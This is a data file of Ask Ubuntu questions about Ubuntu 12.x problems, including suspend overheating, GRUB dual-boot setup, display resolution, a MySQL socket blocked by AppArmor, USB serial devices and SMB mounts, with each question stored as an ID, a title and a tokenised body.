234611	dell studio 15 , turnoff after suspend due to overheat , and does not turnon the fan as well	i am new to ubuntu and linux as well , the thing is ... i got strange problem with my laptop , i am not sure is the problem with my hardware or the os i got : dell studio 15 ( ati graphics card ) with ubuntu 12.10_64bit version installed issue is ... when i suspend ( sleep ) the laptop either by command or by turning the flap off , it does suspend perfectly , but when i wakes it up , it starts and after few minutes around 15-20 it turns off automatically , after reproduction of the error , i realize that the fan is not starting after waking up the laptop , so the laptop starts but not the fan so , it shut down when it gets overheated , can anyone please , help me with this , or show me how to solve this issues . thanks nixit patel
234616	can not detect my sony xperia tipo dual	i have a sony xperia tipo dual phone , and when i connect it via usb and try to download an app from the market , it gets downloaded and installed on my phone , so i guess my phone is detectable by ubuntu , the problem is i can not see it or mount its internal storage nor its sd card so i can e.g . transfer files or so , what can i do to solve this problem ? ? thank you
234623	how can i add a directory to my path ?	i created a .bash_aliases file with the following contents : path= $ path : $ home/opt/bin so it adds /home/myuser/opt/bin to $ path . i made this because i do n't have root access to this machine . when i run apps interactively through the shell command line , they can understand my custom path with no problems . but , if i open a app outside the shell command line , for example , choosing from the unity dash , the same apps ca n't see my custom path . i tried putting shopt -s expand_aliases in my .bash_aliases , but without success . how can i set a path for environments other than bash ?
234626	how to change guake cursor from block to i-beam ?	as the title says , i want to change the cursor of guake to i-beam ( the vertical line ) . i find block cursor to be confusing sometimes . i looked into the preferences but unfortunately there is no option for the cursor . is it possible to change ?
234634	ubuntu 12.04 mouse freezes	i was using ubuntu 11.04 32bit os and in that i was facing a problem from today morning . my mouse freezes after 15 to 20 minutes of every login session . after that i upgraded the os to ubuntu 12.04.1 - 32bit os and facing the same problem . only my computer 's mouse freezes and i 'm able to navigate and work around without any problem using my ps2 keyboard attached . the only thing is mouse is not working after 15 to 20 minutes . i tried almost all the solutions given in askubuntu and none of them helped me . i tried the following questions : mouse freezes on xorg load mouse freezes after 20 minutes of use how to deal with a frozen screen ? after login , mouse not working ! none of these questions helped me . i have tried changing my mouse and connected it to different usb ports . nothing worked . i 'm using a desktop pc with intel motherboard , core-i3 processor , zebronics usb mouse and zippys ps2 keyboard . how this issue can be resolved .
234636	what is the difference between single user mode , recovery mode from grub , and booting with ubuntu install disk ?	what is the difference between the following : entering single user mode , e.g . telinit 1 entering recovery mode , at the grub screen selecting ubuntu ... ( recovery mode ) using the ubuntu installation dvd and entering the command line in what cases would you use the different options for recovery/administration work ?
234637	downloaded kubuntu 12.10 and installed ubuntu 11.10	i wanted to install kubuntu 12.10 from usb on a brand new computer , with no os . i downloaded the file and started the computer with the usb . it installed ubuntu 11.10 . why and how can i change that ?
234640	can i run ubuntu using wayland ?	so , i compiled wayland from official git , saw that it successfully run wenston , now , can i make it run my desktop somehow ?
234641	how to change the title color of a single window ?	in an attempt to ease the navigation between the many windows on my desktop , i would like to give each one of them a different title color . is this possible ? i have 12.04 with unity .
234646	how can i boot from my bootable usb flash drive to install ubuntu ?	i have downloaded the ubuntu 12.10 image , but i can not install it . i 've tried burning it to a pen drive , but when i reboot with it in place , it just boots into windows ! i 've also tried burning it to a dvd , but my computer acts as if the dvd is not bootable . i 've tried using 'wubi ' , but after about 10-15 minutes it gives the error : permission denied- for more info visit the log file what am i doing wrong ?
234650	vmplayer does n't show installed virtual machine	last night i installed vmplayer and installed windows xp professional but this morning its gone . please help where is that or how to start it
234652	how do i fix boot error `` kernel requires a 86-64 cpu '' ?	my desktop pc gives the following error when trying to install from a cd : kernel requires a 86-64 cpu only detected a i686 cpu unable to boot my pc is a medion , 160gb hard drive , pentium 4 processor , 512mb memory . i 'm installing ubuntu 12.04 from the ( complete manual magazine ) .
234656	dual boot `` ubuntu desktop 12.04 '' `` ubuntu server 12.04 '' grub mess up !	i have a system with two version of ubuntu in two hard drives , `` ubuntu desktop 12.04 '' on the first one ( sda1 ) and `` ubuntu server 12.04 '' on the second one ( sdb2 ) . ( first installed desktop then installed server version ) . neither of the two installations have a separate boot partition . both have grub 2 installed . only sda1 has a boot flag . output from sudo parted -l : model : ata ocz-vertex2 ( scsi ) disk /dev/sda : 115gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 111gb 111gb primary ext4 boot 2 111gb 115gb 4122mb extended 5 111gb 115gb 4122mb logical linux-swap ( v1 ) model : ata toshiba mk3252gs ( scsi ) disk /dev/sdb : 320gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 4 1049kb 236gb 236gb primary ntfs 2 236gb 290gb 54,5gb primary ext4 1 290gb 320gb 30,0gb primary lvm by default , ( as it is expected i believe ) computer runs the grub installed on the server version as it is the last one installed . i know that this is the one running , because when i 'm updating the kernel on the desktop version , i have to run `` update-grub '' on the server to list the new kernel in the grub menu ! my question is how can i make it run the grub of the desktop version by default ? when i unplug the second hard drive ( with the server version ) , i get this error message : error : no such device ... . # ( i do n't remember the name of the device ) grub rescue >
234660	stuck on extremely low resolution 800x600 ; native resolution 1680x1050	i know this has been touched on by a lot of different threads by a lot of different people , but i ca n't for the life of me figure out how to fix it . i 'm on a duel boot windows 8/ubuntu system and have recently changed my monitor . i am using proprietary drivers and my graphics card is a nvidia geforce 660 ti , the new monitor i am using is a vx2025wm ( click here to view the manual ) . i know that the monitor works on it 's native resolution , because when booting on windows 8 it automatically adjusts to 1680x1050 . i 'm not sure if it 's worth noting or not , but the old monitor would view grub on a higher resolution by default , while this one continues to use low resolution until booted into windows 8 . i 'm really at my wits end , i 'm not really used to ubuntu and i do n't have a ton of experience with linux in general . any help would be greatly appreciated . i 've included my xorg.conf file xorg.conf section `` inputdevice '' identifier `` razer naga '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' identifier `` razer lycosa '' driver `` kbd '' endsection section `` monitor '' identifier `` vs10859 viewsonic widescreen '' vendorname `` viewsonic '' modelname `` dfp-0 '' # displaysize 433.44 270.9 horizsync 30.0 - 82.0 vertrefresh 50.0 - 75.0 modeline `` 1680x1050_60.00 '' 146.25 1680 1784 1960 2240 1050 1053 1059 1089 option `` preferredmode '' `` 1680x1050_60.00 '' endsection section `` device '' identifier `` gtx 660 ti '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gtx 660 ti '' endsection section `` screen '' identifier `` primary screen '' device `` gtx 660 ti '' monitor `` vs10859 viewsonic widescreen '' defaultdepth 24 option `` nvidiaxineramainfoorder '' `` dfp-0 '' option `` metamodes '' `` 1680x1050_60 +0+0 ; nvidia-auto-select +0+0 '' subsection `` display '' depth 24 modes `` 1680x1050 '' `` 1280x1024 '' endsubsection endsection section `` serverlayout '' identifier `` default layout '' screen `` primary screen '' inputdevice `` razer naga '' `` corepointer '' inputdevice `` razer lycosa '' `` corekeyboard '' option `` xinerama '' `` 0 '' endsection
234663	what command should i type to run chrome from the terminal ?	i have remote box accessed by vnc and jwm desktop . no menus , not desktop icons , only a terminal window . i have downloaded chrome 's .deb package and installed it . now how can i run it from the terminal window ?
234664	could not decode stream in ubuntu 12.10	when i want to play radio stream in clementine , i get error : could not decode stream . i installed w32codecs , but is not solved . sudo apt-get -y install w32codecs ubuntu-restricted-extras how can i solve this ?
234667	dual booting pre-installed windows 8	i 've recently purchased a lenovo t430 , and sadly when configuring it , i forgot all about the linux uefi fiasco , and kept the default option of pre-installing windows 8 . i 'm able to disable secure-boot , but what i would like to know is whether i need to install ubuntu in uefi or legacy mode . i am aware is possible to find this out by installing ubuntu along side windows normally and fixing it if it fails ( trial & error in my opinion ) , but i would rather install ubuntu normally , or install it in uefi mode first off .
234668	ca n't start mysql server if the .sock file is changed in /etc/mysql/my.cnf	i have installed mysql server 5.5 on ubuntu 12.04 . i am trying to start mysql server on a different sock file . by default mysql runs on /var/run/mysqld/mysqld.sock . i am trying to run the same server on /var/run/mysqld/mysqld1.sock . for this i have made the following changes : changes to /etc/mysql/my.cnf [ client ] port = 3306 socket = /var/run/mysqld/mysqld1.sock [ mysqld_safe ] socket = /var/run/mysqld/mysqld1.sock nice = 0 [ mysqld ] user = mysql pid-file = /var/run/mysqld/mysqld.pid **socket = /var/run/mysqld/mysqld1.sock** port = 3306 basedir = /usr datadir = /var/lib/mysql tmpdir = /tmp lc-messages-dir = /usr/share/mysql i also added the following line to /etc/apparmor.d/usr/sbin.mysqld /var/run/mysqld/mysqld1.sock w , /var/run/mysqld/mysqld [ 1-9 ] .sock w , i also changed the ownership for the directory /var/run/mysqld to mysql user . ls -la /var/run/ | grep mysqld drwxrwxrwx 2 mysql mysql 40 dec 31 17:24 mysqld however when i try to start mysql server i get the following error ( as a root user ) $ mysqld -- user=mysql -- verbose 121231 18:40:56 [ note ] plugin 'federated ' is disabled . 121231 18:40:56 innodb : the innodb memory heap is disabled 121231 18:40:56 innodb : mutexes and rw_locks use gcc atomic builtins 121231 18:40:56 innodb : compressed tables use zlib 1.2.3.4 121231 18:40:56 innodb : initializing buffer pool , size = 128.0m 121231 18:40:56 innodb : completed initialization of buffer pool 121231 18:40:56 innodb : highest supported file format is barracuda . 121231 18:40:57 innodb : waiting for the background threads to start 121231 18:40:58 innodb : 1.1.8 started ; log sequence number 1595685 121231 18:40:58 [ note ] server hostname ( bind-address ) : '127.0.0.1 ' ; port : 3306 121231 18:40:58 [ note ] - '127.0.0.1 ' resolves to '127.0.0.1 ' ; 121231 18:40:58 [ note ] server socket created on ip : '127.0.0.1 ' . **`121231 18:40:58 [ error ] ca n't start server : bind on unix socket : permission denied`** 121231 18:40:58 [ error ] do you already have another mysqld server running on socket : /var/run/mysqld/mysqld1.sock ? 121231 18:40:58 [ error ] aborting** 121231 18:40:58 innodb : starting shutdown ... 121231 18:40:58 innodb : shutdown completed ; log sequence number 1595685 121231 18:40:58 [ note ] mysqld : shutdown complete if i start the server with the default socket file , i am able to start the server . i have googled about this issue but only found solutions suggesting it to be permissions issue . however the permissions seems fine . some have suggested that apparmor might be a cause , but i have checked that too - snippet is pasted above . can someone provide some clues ? [ edit ] i see the following output in /var/log/syslog . jan 2 12:09:34 praveshp-lt mysqld : 130102 12:09:34 [ note ] plugin 'federated ' is disabled . jan 2 12:09:34 praveshp-lt mysqld : 130102 12:09:34 innodb : the innodb memory heap is disabled jan 2 12:09:34 praveshp-lt mysqld : 130102 12:09:34 innodb : mutexes and rw_locks use gcc atomic builtins jan 2 12:09:34 praveshp-lt mysqld : 130102 12:09:34 innodb : compressed tables use zlib 1.2.3.4 jan 2 12:09:34 praveshp-lt mysqld : 130102 12:09:34 innodb : initializing buffer pool , size = 128.0m jan 2 12:09:34 praveshp-lt mysqld : 130102 12:09:34 innodb : completed initialization of buffer pool jan 2 12:09:34 praveshp-lt mysqld : 130102 12:09:34 innodb : highest supported file format is barracuda . jan 2 12:09:35 praveshp-lt mysqld : 130102 12:09:35 innodb : waiting for the background threads to start jan 2 12:09:36 praveshp-lt mysqld : 130102 12:09:36 innodb : 1.1.8 started ; log sequence number 1595685 jan 2 12:09:36 praveshp-lt mysqld : 130102 12:09:36 [ note ] server hostname ( bind-address ) : '127.0.0.1 ' ; port : 3307 jan 2 12:09:36 praveshp-lt mysqld : 130102 12:09:36 [ note ] - '127.0.0.1 ' resolves to '127.0.0.1 ' ; jan 2 12:09:36 praveshp-lt mysqld : 130102 12:09:36 [ note ] server socket created on ip : '127.0.0.1 ' . jan 2 12:09:36 praveshp-lt mysqld : 130102 12:09:36 [ error ] ca n't start server : bind on unix socket : permission denied jan 2 12:09:36 praveshp-lt mysqld : 130102 12:09:36 [ error ] do you already have another mysqld server running on socket : /var/run/mysqld/mysqld1.sock ? jan 2 12:09:36 praveshp-lt mysqld : 130102 12:09:36 [ error ] aborting jan 2 12:09:36 praveshp-lt mysqld : jan 2 12:09:36 praveshp-lt mysqld : 130102 12:09:36 innodb : starting shutdown ... jan 2 12:09:36 praveshp-lt kernel : [ 7060.098580 ] type=1400 audit ( 1357108776.036:33 ) : apparmor= '' denied '' operation= '' mknod '' parent=6702 profile= '' /usr/sbin/mysqld '' name= '' /run/mysqld/mysqld1.sock '' pid=7039 comm= '' mysqld '' requested_mask= '' c '' denied_mask= '' c '' fsuid=116 ouid=116 jan 2 12:09:36 praveshp-lt mysqld : 130102 12:09:36 innodb : shutdown completed ; log sequence number 1595685 jan 2 12:09:36 praveshp-lt mysqld : 130102 12:09:36 [ note ] /usr/sbin/mysqld : shutdown complete it says permission denied , however i seem to have set the right permissions .
234677	copying to ntfs drives	i am running ubuntu 12.04 lts and windows xp . i have copies files from ubuntu to my drive e : and all went well . log into windows and drive e : is classed as a local drive and appears not to be formatted so i am unable to access any files . it is still visible to ubuntu but the folder i copied to file to is now empty , had 20 or so files in or before . can anyone offer an explanation ?
234678	how to show ascii art at the top of the terminal when it 's opened ?	as you can see on this screeshot of mik 's guake he have a statup message of ascii art when he opens it , and that 's what i 'd like to do , can someone help me ?
234684	mythtv backend package build options	i would like to know if the mythubuntu mythtv backend 0.25 ( 12.04 ) was built with -- enable-libx264 or -- enable-libmp3lame options . these options are needed to use the torc ios app and probably also with the new vdr xbmc 12 . thanks for your help .
234689	can not permanently prevent power saving blank screen on compaq presario c700 with ubuntu 12.10	i have a compaq presario c700 which has a grub multi-boot for ubuntu 12.10 ( 32 bit ) , ubuntu 10.10 and windows vista . this machine is always run by mains electricity rather than by battery as i have hooked it up to my 40 '' tv . it works like a dream in every respect - except one ... if i want to watch a video longer than 10 minutes the power-saving blank screen associated with an inactive keyboard/mouse kicks in ; a tap of a key or movement of the mouse restores the display instantly . this is irritating and happens for both 10.10 and 12.10 . i have tried the following remedies : checked bios for advanced setting that might override ubuntu commands ( no such settings exist ) changed system power settings in 12.10 to 'do n't suspend ' ( battery or plugged in ) for inactive behavior and 'do nothing ' when lid is closed for battery and plugged in . `` when power is critically low '' has been left with the default blank ( although this is not really applicable as the unit is always plugged in ) . changed system brightness and lock settings in 12.10 to 'turn screen off when inactive for : ' to never . lock is set to 'off ' and 'turns screen off ' option is greyed out . brightness is set to maximum and 'dim screen to save power ' is unchecked . i have checked out the displays , keyboard and mouse settings but there is nothing of relevance there . i have seen a similar question on ask ubuntu but there were no satisfactory permanent solutions for ubuntu 12.10 âturn screen off when inactive for : neverâ still turns off as sudo xset s off did not work sudo xset s 0 0 did work within the session ( screensaver timeout = 0 ; cycle =0 ) but on rebooting from cold xset q showed a reverted screensaver timeout = 600 ; cycle = 600 - so it is not an acceptable solution . ( yes - i do have administrator rights ! ) one annoying facet of this problem is that the screen goes blank after 10 minutes of inactivity and it takes 10 ( very long ) minutes to find out if a solution has worked so any trial and error method of solving this has a significant time penalty for me . has anyone experienced and successfully overcome this problem ?
234690	how to backup over lan	in 12.04 lts i would like to get grsync to back up to another ubuntu pc 's hard drive . in nautilus file manager i can connect to the other pcs ok. how do i address another pc 's hard drive in grsync or other backup package ?
234691	can not mount/see/access usb-device - ttyusb0	i am trying to connect to a gps sport watch ( similar to garmin watches ) . i am running ubuntu 12.04 , 64bit . ideally , i would like to connect the watch to one of the os sport softwares like turtle sport or pytrainer . currently , i however can not even access the raw data saved on the device itself . when i plug in the watch via a usb cable , it seems to be recognized , as it is listed in the output of # lsusb bus 002 device 004 : id 10c4 : ea60 cygnal integrated products , inc. cp210x composite device or more detailed # lsub -v bus 002 device 004 : id 10c4 : ea60 cygnal integrated products , inc. cp210x composite device could n't open device , some information will be missing device descriptor : blength 18 bdescriptortype 1 bcdusb 2.00 bdeviceclass 0 ( defined at interface level ) bdevicesubclass 0 bdeviceprotocol 0 bmaxpacketsize0 64 idvendor 0x10c4 cygnal integrated products , inc. idproduct 0xea60 cp210x composite device bcddevice 1.00 imanufacturer 1 iproduct 2 iserial 3 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 32 bnuminterfaces 1 bconfigurationvalue 1 iconfiguration 0 bmattributes 0x80 ( bus powered ) maxpower 100ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 2 binterfaceclass 255 vendor specific class binterfacesubclass 0 binterfaceprotocol 0 iinterface 2 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x01 ep 1 out bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0040 1x 64 bytes binterval 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x82 ep 2 in bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0040 1x 64 bytes binterval 0 the watch signals that the battery is being loaded , so it seems to get some sort of signal from the connection . however , i can neither access the device nor does it appear in nautilus . the relevant output of dmesg looks as follows : [ 18.949280 ] usbcore : registered new interface driver usbserial [ 18.949952 ] usb serial support registered for generic [ 18.950933 ] usbcore : registered new interface driver usbserial_generic [ 18.950936 ] usbserial : usb serial driver core [ 18.954875 ] usb serial support registered for cp210x [ 18.954911 ] cp210x 2-5:1.0 : cp210x converter detected [ 19.111293 ] acpi : pci interrupt link [ lneb ] enabled at irq 18 [ 19.111313 ] nvidia 0000:06:00.0 : pci int a - > link [ lneb ] - > gsi 18 ( level , low ) - > irq 18 [ 19.111322 ] nvidia 0000:06:00.0 : setting latency timer to 64 [ 19.111327 ] vgaarb : device changed decodes : pci:0000:06:00.0 , olddecodes=io+mem , decodes=none : owns=io+mem [ 19.111531 ] nvrm : loading nvidia unix x86_64 kernel module 173.14.35 fri jun 8 00:07:59 pdt 2012 [ 19.128225 ] usb 2-5 : reset full-speed usb device number 3 using ohci_hcd [ 19.335214 ] usb 2-5 : cp210x converter now attached to ttyusb0 [ 19.335235 ] usbcore : registered new interface driver cp210x [ 19.335237 ] cp210x : v0.09 : silicon labs cp210x rs232 serial adaptor driver the corresponding driver seems to be loaded : # lsmod |grep cp210x cp210x 21898 0 usbserial 47077 1 cp210x it also seems as if a device was created # ls -l /dev/ttyusb* crw-rw -- -- 1 root dialout 188 , 0 dec 31 14:08 /dev/ttyusb0 so - as far as my understanding goes ( probably not very far , really ) , it seems to load and attach the driver correctly . however , after the dmesg output shown above , i see some code that i do n't quite understand [ 19.735193 ] kjournald starting . commit interval 5 seconds [ 19.735547 ] ext3-fs ( sdb2 ) : using internal journal [ 19.735552 ] ext3-fs ( sdb2 ) : mounted filesystem with ordered data mode [ 20.591773 ] vesafb : mode is 1280x1024x32 , linelength=5120 , pages=0 [ 20.591777 ] vesafb : scrolling : redraw [ 20.591780 ] vesafb : truecolor : size=8:8:8:8 , shift=24:16:8:0 [ 20.593323 ] vesafb : framebuffer at 0xd0000000 , mapped to 0xffffc90010a80000 , using 5120k , total 5120k [ 20.593576 ] console : switching to colour frame buffer device 160x64 [ 20.593604 ] fb0 : vesa vga frame buffer device [ 23.124371 ] init : failsafe main process ( 948 ) killed by term signal [ 23.240243 ] bluetooth : core ver 2.16 [ 23.240289 ] net : registered protocol family 31 [ 23.240291 ] bluetooth : hci device and connection manager initialized [ 23.240295 ] bluetooth : hci socket layer initialized [ 23.240297 ] bluetooth : l2cap socket layer initialized [ 23.240644 ] bluetooth : sco socket layer initialized [ 23.243393 ] ppdev : user-space parallel port driver [ 23.245909 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 23.245914 ] bluetooth : bnep filters : protocol multicast [ 23.267923 ] bluetooth : rfcomm tty layer initialized [ 23.267930 ] bluetooth : rfcomm socket layer initialized [ 23.267932 ] bluetooth : rfcomm ver 1.11 [ 23.285082 ] type=1400 audit ( 1356962831.181:5 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/cups/backend/cups-pdf '' pid=1033 comm= '' apparmor_parser '' [ 23.287852 ] type=1400 audit ( 1356962831.181:6 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/sbin/cupsd '' pid=1033 comm= '' apparmor_parser '' [ 23.297740 ] type=1400 audit ( 1356962831.193:7 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /sbin/dhclient '' pid=1054 comm= '' apparmor_parser '' [ 23.301207 ] type=1400 audit ( 1356962831.197:8 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/lightdm/lightdm/lightdm-guest-session-wrapper '' pid=1053 comm= '' apparmor_parser '' [ 23.310950 ] type=1400 audit ( 1356962831.205:9 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=1054 comm= '' apparmor_parser '' [ 23.312250 ] type=1400 audit ( 1356962831.209:10 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=1054 comm= '' apparmor_parser '' [ 23.316800 ] type=1400 audit ( 1356962831.213:11 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/telepathy/mission-control-5 '' pid=1060 comm= '' apparmor_parser '' [ 23.317349 ] type=1400 audit ( 1356962831.213:12 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/telepathy/telepathy-* '' pid=1060 comm= '' apparmor_parser '' [ 23.321411 ] type=1400 audit ( 1356962831.217:13 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/cups/backend/cups-pdf '' pid=1062 comm= '' apparmor_parser '' [ 23.324683 ] type=1400 audit ( 1356962831.221:14 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/sbin/cupsd '' pid=1062 comm= '' apparmor_parser '' [ 23.355073 ] forcedeth 0000:00:08.0 : irq 45 for msi/msi-x [ 33.752029 ] eth0 : no ipv6 routers present [ 81.464968 ] usb 2-5 : usb disconnect , device number 3 [ 81.465125 ] cp210x ttyusb0 : cp210x converter now disconnected from ttyusb0 [ 81.465140 ] cp210x 2-5:1.0 : device disconnected [ 89.452023 ] usb 2-5 : new full-speed usb device number 4 using ohci_hcd [ 89.682827 ] cp210x 2-5:1.0 : cp210x converter detected [ 89.860039 ] usb 2-5 : reset full-speed usb device number 4 using ohci_hcd [ 90.066722 ] usb 2-5 : cp210x converter now attached to ttyusb0 [ 165.960043 ] ata6 : eh in swncq mode , qc : qc_active 0x13f sactive 0x13f [ 165.960048 ] ata6 : swncq : qc_active 0x13a defer_bits 0x5 last_issue_tag 0x1 [ 165.960049 ] dhfis 0x13a dmafis 0x130 sdbfis 0xc5 [ 165.960052 ] ata6 : ata_reg 0x41 err_reg 0x0 [ 165.960054 ] ata6 : tag : dhfis dmafis sdbfis sactive [ 165.960056 ] ata6 : tag 0x1 : 1 0 0 1 [ 165.960059 ] ata6 : tag 0x3 : 1 0 0 1 [ 165.960060 ] ata6 : tag 0x4 : 1 1 0 1 [ 165.960062 ] ata6 : tag 0x5 : 1 1 0 1 [ 165.960064 ] ata6 : tag 0x8 : 1 1 0 1 [ 165.960074 ] ata6.00 : exception emask 0x1 sact 0x13f serr 0x0 action 0x6 frozen [ 165.960076 ] ata6.00 : ata error . fis:0x21 [ 165.960079 ] ata6.00 : failed command : read fpdma queued [ 165.960085 ] ata6.00 : cmd 60/08:00:67:40:4b/00:00:01:00:00/40 tag 0 ncq 4096 in [ 165.960086 ] res 41/00:08 : db : f5:30/00:00:08:00:00/40 emask 0x1 ( device error ) [ 165.960089 ] ata6.00 : status : { drdy err } [ 165.960091 ] ata6.00 : failed command : read fpdma queued [ 165.960096 ] ata6.00 : cmd 60/08:08 : db : f5:30/00:00:08:00:00/40 tag 1 ncq 4096 in [ 165.960097 ] res 41/00:08 : db : f5:30/00:00:08:00:00/40 emask 0x1 ( device error ) [ 165.960100 ] ata6.00 : status : { drdy err } [ 165.960102 ] ata6.00 : failed command : read fpdma queued [ 165.960107 ] ata6.00 : cmd 60/08:10 : ef : bc:11/00:00:01:00:00/40 tag 2 ncq 4096 in [ 165.960108 ] res 41/00:08 : db : f5:30/00:00:08:00:00/40 emask 0x1 ( device error ) [ 165.960110 ] ata6.00 : status : { drdy err } [ 165.960112 ] ata6.00 : failed command : read fpdma queued [ 165.960117 ] ata6.00 : cmd 60/10:18 : e3 : c4 : d4/00:00:09:00:00/40 tag 3 ncq 8192 in [ 165.960118 ] res 41/00:08 : db : f5:30/00:00:08:00:00/40 emask 0x1 ( device error ) [ 165.960120 ] ata6.00 : status : { drdy err } [ 165.960122 ] ata6.00 : failed command : read fpdma queued [ 165.960127 ] ata6.00 : cmd 60/08:20 : e3 : dc : d4/00:00:09:00:00/40 tag 4 ncq 4096 in [ 165.960128 ] res 41/00:08 : db : f5:30/00:00:08:00:00/40 emask 0x1 ( device error ) [ 165.960131 ] ata6.00 : status : { drdy err } [ 165.960133 ] ata6.00 : failed command : read fpdma queued [ 165.960138 ] ata6.00 : cmd 60/18:28 : db : dd : d4/00:00:09:00:00/40 tag 5 ncq 12288 in [ 165.960139 ] res 41/00:08 : db : f5:30/00:00:08:00:00/40 emask 0x1 ( device error ) [ 165.960141 ] ata6.00 : status : { drdy err } [ 165.960143 ] ata6.00 : failed command : read fpdma queued [ 165.960148 ] ata6.00 : cmd 60/18:40 : d3 : e3 : d4/00:00:09:00:00/40 tag 8 ncq 12288 in [ 165.960149 ] res 41/00:08 : db : f5:30/00:00:08:00:00/40 emask 0x1 ( device error ) [ 165.960152 ] ata6.00 : status : { drdy err } [ 165.960158 ] ata6 : hard resetting link [ 165.960159 ] ata6 : nv : skipping hardreset on occupied port [ 166.432050 ] ata6 : sata link up 1.5 gbps ( sstatus 113 scontrol 300 ) [ 166.788120 ] ata6.00 : configured for udma/133 [ 166.788142 ] ata6 : eh complete i would be grateful for any hints on how to fix the problem . *t
234693	how to remove hijacked website in chromium	i think my chromium browser has been hijacked . from now and then , when i surf to a website it automatically changes to hxxp : //lp.zpdownload.info/mv/ with some advertisement for movies and to download a file . the only think i can do is to type in the website adress again and then it directs me correctly . how can i remove this ? i 'm working on ubuntu 12.10
234694	external hard drive problem since upgrade	sorry if this does n't make a lot of sense but i am no expert : - ) have been using ubuntu for a couple of years , i recently upgraded to 12.04.1 lts and now my external hardrive will not let me access it . it mounts when i plug it in but when i try to write to it or delete anything it says it is write only . i have changed permissions but it still wo n't and just reverts back to read only . when the drive is plugged into the tv ( via usb ) i can watch things so that is working . really do n't know what to do next v frustrated maggie
234698	how to install ubuntu on a cr-48 chromebook ?	a few weeks ago my chromebook got crazy and its os got corrupted for an unknown reason . i 'd like to instal ubuntu 12.04 64bit on it using a bootable usb pendrive , but since it is not the usual installation that i am used to on pcs/laptops ... .i am a bit stuck and dont even know where to start . i 'd simply like to make a pendrive that i can make bootable for my chromebook and do the installation .
234701	mounting drive not getting full access	i am having problem with mounting.. i bought iomega storage box ix200 . i shared a folder from iomega box for 10 users . i mounted this shared drive in all 10 virtual machines by editing /etc/fstab file . after rebooting the drive got mounted . but when a user accessing it and tries to create a new file it shows lock symbol on it . but if i try to access this drive from menu - location and , from there put file server ip and do then i am able to create a file without lock symbol . it 's opening read-only for all the users . this is happening for all the users except 1 user . if i assign that user then its working fine . can someone guide me what may be the issue . hi thanks for your response . please find below information root @ jhsp-christopher : ~ # cat /etc/fstab /etc/fstab : static file system information . # use 'blkid ' to print the universally unique identifier for a device ; this may be used with uuid= as a more robust way to name devices that works even if disks are added and removed . see fstab ( 5 ) . # proc /proc proc nodev , noexec , nosuid 0 0 / was on /dev/sda1 during installation uuid=d82e0cc6-4bff-4dba-89af-1d5965057568 / ext4 errors=remount-ro 0 1 swap was on /dev/sda5 during installation uuid=041df524-1e47-4ba2-9046-1f8aee0870ad none swap sw 0 0 //192.168.1.150/worksdaily /media/jhsp-fs smbfs username=christopher , password=chh156 rw 0 0 //192.168.1.150/christopher /media/christopher smbfs username=christopher , password=chh156 rw 0 0 root @ jhsp-christopher : ~ # mount /dev/sda1 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) //192.168.1.150/christopher on /media/christopher type cifs ( rw ) //192.168.1.150/worksdaily on /media/jhsp-fs type cifs ( rw ) gvfs-fuse-daemon on /home/jhsp/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=jhsp ) gvfs-fuse-daemon on /home/christopher/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=christopher ) root @ jhsp-christopher : ~ # ls -ld $ ( mount | cut -d ' ' -f 3 ) drwxr-xr-x 23 root root 4096 dec 19 19:18 / drwxr-xr-x 14 root root 4080 jan 6 19:10 /dev drwxr-xr-x 2 root root 0 jan 6 19:10 /dev/pts drwx -- -- -- 2 christopher christopher 4096 dec 20 00:13 /home/christopher/.gvfs drwx -- -- -- 2 jhsp jhsp 4096 dec 18 15:02 /home/jhsp/.gvfs drwxrwxrwx 2 99 users 0 jan 5 14:40 /media/christopher drwxrwxrwx 6 99 users 0 jan 7 17:51 /media/jhsp-fs dr-xr-xr-x 232 root root 0 jan 6 19:10 /proc drwxr-xr-x 23 root root 980 jan 11 19:50 /run drwxrwxrwt 3 root root 60 jan 11 17:35 /run/lock drwxrwxrwt 2 root root 320 jan 11 19:36 /run/shm drwxr-xr-x 13 root root 0 jan 6 19:10 /sys drwxr-xr-x 4 root root 0 jan 6 19:10 /sys/fs/fuse/connections drwx -- -- -- 14 root root 0 jan 6 19:10 /sys/kernel/debug drwxr-xr-x 3 root root 0 jan 6 19:10 /sys/kernel/security
